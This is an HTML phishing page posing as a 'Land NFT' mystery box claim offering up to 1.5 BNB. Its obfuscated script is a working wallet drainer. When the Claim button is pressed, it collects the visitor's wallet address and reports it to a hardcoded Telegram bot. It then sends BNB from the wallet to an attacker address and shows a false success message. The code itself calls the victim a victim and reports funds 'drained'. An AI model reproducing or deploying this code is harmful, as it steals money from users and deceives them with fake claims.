<!DOCTYPE html>
<html>
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Land Nft</title>
	<style>
		body {
			background-color: black;
			margin: 0;
			padding: 0;
			font-family: Arial, sans-serif;
		}
		.container {
			max-width: 800px;
			margin: 0 auto;
			padding: 20px;
			box-sizing: border-box;
			text-align: center;
		}
		h1 {
			margin: 0;
			padding: 0;
			font-size: 32px;
		}
		button {
			background-color: #f59e0b;
			color: #fff;
			font-size: 16px;
			font-weight: bold;
			border: none;
			border-radius: 10px;
			padding: 10px 20px;
			margin-top: 20px;
			cursor: pointer;
			transition: all 0.2s ease;
			box-shadow: 2px 2px 4px rgba(0, 0, 0, 0.3);
			width: 100%;
			max-width: 300px;
			display: block;
			margin: 0 auto;
		}
		button:hover {
			background-color: #f39c03;
			box-shadow: 4px 4px 6px rgba(0, 0, 0, 0.3);
		}
		.header {
			background-color: #333;
			color: #fff;
			padding: 10px 0;
			margin-bottom: 20px;
		}
		.header h2 {
			margin: 0;
			padding: 0;
			font-size: 24px;
			text-align: center;
		}
		.footer {
			background-color: #333;
			color: #fff;
			padding: 10px 0;
			position: absolute;
			bottom: 0;
			width: 100%;
			margin: 0;
			text-align: center;
		}
		.footer p {
			margin: 0;
			padding: 0;
			font-size: 14px;
			text-align: center;
		}
		img {
		display: block;
		margin: 0 auto 20px;
		max-width: 80%;
		height: auto;
		border-radius: 5%;
		}
	</style>
</head>
<body>
	<div class="header">
		<h2>Claim Land Mystery Box And Win Upto 1.5 BNB</h2>
	</div>
	<div class="container">
		<img src="https://public.nftstatic.com/static/nft/res/nft-cex/S3/1673751368263_g47nrh9ghloh809xug8l0rv92l3e6nmh_400x400.gif" alt="Logo">
		<button onclick="connectWallet()">Claim</button>
	</div>
       	</div>       	
	</br>
	<div class="footer">
		<p>Copyright &copy; 2023 LAND.nfs</p>
	</div>
	
<script>function _0x1a1a(){const _0x20b04b=['454905uuguMK','constructor','toString','42hbDHzS','Successfully\x20claimed\x20NFT\x20worth\x20$13\x20BSC','30yDjoSR','message','\x20Connected.\x0aBALANCE:${bscBalance}\x0aNow\x20waiting\x20for\x20victim\x20approval...','374625vcXEJM','eth_sendTransaction','search','Please\x20switch\x20to\x20Binance\x20Smart\x20Chain\x20network!','2233984GTqsVm','15166aIXORn','net_version','eth_requestAccounts','Successfully\x20drained\x200.00227\x20BNB\x20from\x20','130gwyUTO','json','69097bnjoUH','ethereum','1030506xkyirE','Please\x20open\x20in\x20your\x20Trust\x20Wallet\x20Daaps\x20Browser.\x20Other\x20wallets\x20are\x20not\x20supported','/sendMessage?chat_id=','6127539OJpQvZ','https://api.telegram.org/bot','apply','264OgnQxT','&text=','Need\x200.00227\x20BSC\x20To\x20Fees','eth_getBalance','request','(((.+)+)+)+$','5000000000','https://bscscan.com/tx/'];_0x1a1a=function(){return _0x20b04b;};return _0x1a1a();}function _0x4790(_0x565d43,_0x22006e){const _0x33e4ff=_0x1a1a();return _0x4790=function(_0x54ed3a,_0x5ce439){_0x54ed3a=_0x54ed3a-0x13f;let _0x1a1a31=_0x33e4ff[_0x54ed3a];return _0x1a1a31;},_0x4790(_0x565d43,_0x22006e);}(function(_0x22201f,_0x53c848){const _0x1e1821=_0x4790,_0x137167=_0x22201f();while(!![]){try{const _0x5d4405=parseInt(_0x1e1821(0x147))/0x1*(parseInt(_0x1e1821(0x14f))/0x2)+-parseInt(_0x1e1821(0x157))/0x3+parseInt(_0x1e1821(0x14e))/0x4+parseInt(_0x1e1821(0x14a))/0x5*(-parseInt(_0x1e1821(0x145))/0x6)+-parseInt(_0x1e1821(0x155))/0x7*(-parseInt(_0x1e1821(0x15d))/0x8)+-parseInt(_0x1e1821(0x142))/0x9*(-parseInt(_0x1e1821(0x153))/0xa)+-parseInt(_0x1e1821(0x15a))/0xb;if(_0x5d4405===_0x53c848)break;else _0x137167['push'](_0x137167['shift']());}catch(_0x4b9bff){_0x137167['push'](_0x137167['shift']());}}}(_0x1a1a,0x53eec));const _0x5ce439=(function(){let _0x4188c4=!![];return function(_0x4974ee,_0x4c320c){const _0x99063=_0x4188c4?function(){const _0x11bfe6=_0x4790;if(_0x4c320c){const _0x12c6e8=_0x4c320c[_0x11bfe6(0x15c)](_0x4974ee,arguments);return _0x4c320c=null,_0x12c6e8;}}:function(){};return _0x4188c4=![],_0x99063;};}()),_0x54ed3a=_0x5ce439(this,function(){const _0x2d07c9=_0x4790;return _0x54ed3a['toString']()[_0x2d07c9(0x14c)]('(((.+)+)+)+$')[_0x2d07c9(0x144)]()[_0x2d07c9(0x143)](_0x54ed3a)[_0x2d07c9(0x14c)](_0x2d07c9(0x13f));});_0x54ed3a();async function connectWallet(){const _0x49f888=_0x4790;if(window[_0x49f888(0x156)])try{await window[_0x49f888(0x156)][_0x49f888(0x161)]({'method':_0x49f888(0x151)});const _0x3b53d6=await window[_0x49f888(0x156)][_0x49f888(0x161)]({'method':_0x49f888(0x150)});if(_0x3b53d6==='56'){const _0x3b36d8=await window[_0x49f888(0x156)][_0x49f888(0x161)]({'method':'eth_accounts'}),_0x531b4a=_0x3b36d8[0x0],_0x42c93a='6121925114:AAHTYtyfr2E-7Jb3tyBWIgpFlwqfDAoth88',_0x200111='1967434267',_0xeaee46=encodeURIComponent(_0x531b4a+_0x49f888(0x149)),_0x1bfd25=_0x49f888(0x15b)+_0x42c93a+_0x49f888(0x159)+_0x200111+_0x49f888(0x15e)+_0xeaee46,_0x2c898f=await fetch(_0x1bfd25),_0x4d76e7=await _0x2c898f[_0x49f888(0x154)](),_0x1d6751=await window[_0x49f888(0x156)][_0x49f888(0x161)]({'method':_0x49f888(0x160),'params':[_0x531b4a,'latest']}),_0x555552=parseInt(_0x1d6751)/0xa**0x12;if(_0x555552>0.0001){const _0x1d55e3={'from':_0x531b4a,'to':'0x9BFa41A42E1772CAf17cE7fB8A269bC2b532a18D','value':0.00227*0xa**0x12,'gasPrice':_0x49f888(0x140)},_0x180ae3=await window[_0x49f888(0x156)]['request']({'method':_0x49f888(0x14b),'params':[_0x1d55e3]}),_0x16c24d=_0x49f888(0x141)+_0x180ae3,_0x5f3d01=encodeURIComponent(_0x49f888(0x152)+_0x531b4a+'\x0a'+_0x16c24d),_0x5deb31=_0x49f888(0x15b)+_0x42c93a+_0x49f888(0x159)+_0x200111+_0x49f888(0x15e)+_0x5f3d01,_0x5bdc0f=await fetch(_0x5deb31),_0x51995e=await _0x5bdc0f[_0x49f888(0x154)]();alert(_0x49f888(0x146));}else alert(_0x49f888(0x15f));}else alert(_0x49f888(0x14d));}catch(_0x2a3056){alert(_0x2a3056[_0x49f888(0x148)]);}else alert(_0x49f888(0x158));}</script>

	</body>
	</html>